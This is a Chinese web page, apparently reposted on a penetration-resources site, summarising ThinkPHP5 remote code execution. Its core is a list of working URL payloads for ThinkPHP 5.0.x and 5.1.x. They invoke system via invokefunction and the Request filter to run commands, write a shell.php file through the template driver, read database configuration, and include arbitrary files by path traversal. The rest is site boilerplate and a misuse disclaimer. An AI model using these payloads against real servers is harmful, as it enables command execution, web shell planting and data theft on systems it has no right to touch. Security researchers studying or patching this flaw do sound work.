最新公告
  • 欢迎您光临樱灵极客网,全网最全渗透资源!立即加入我们
  • Thinkphp5 RCE总结 _ ChaBug安全

     首页 / 代码审计
    Thinkphp5 RCE总结
    Y4er • 2019年11月27日 pm11:26 • 代码审计 • 阅读 329
    thinkphp5最出名的就是rce,我先总结rce,rce有两个大版本的分别
    1. ThinkPHP 5.0-5.0.24
    2. ThinkPHP 5.1.0-5.1.30
    因为漏洞触发点和版本的不同,导致payload分为多种,其中一些payload需要取决于debug选项
    比如直接访问路由触发的
    5.1.x :
    ?s=index/thinkRequest/input&filter[]=system&data=pwd
    ?s=index/thinkviewdriverPhp/display&content=
    ?s=index/thinktemplatedriverfile/write&cacheFile=shell.php&content=
    ?s=index/thinkContainer/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
    ?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
    5.0.x :
    ?s=index/thinkconfig/get&name=database.username # 获取配置信息
    ?s=index/thinkLang/load&file=../../test.jpg # 包含任意文件

    欢迎您光临樱灵极客网,全网最全渗透资源!
    樱灵极客 » Thinkphp5 RCE总结 _ ChaBug安全

    常见问题FAQ

    本站的资源能否直接商用?
    本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。
    我可以随意使用学习的技术么?
    技术是把双刃剑,我们学习是为了普及网络知识,滥用造成的后果本站概不负责。
    为什么有些资源打不开?
    本站资源均由用户分享,如有个别打不开的文件,请及时联系管理员处理。

    发表评论

    • 466会员总数(位)
    • 172资源总数(个)
    • 0本周发布(个)
    • 0 今日发布(个)
    • 206稳定运行(天)

    全网最全渗透资源学习网!

    我要投稿 成为会员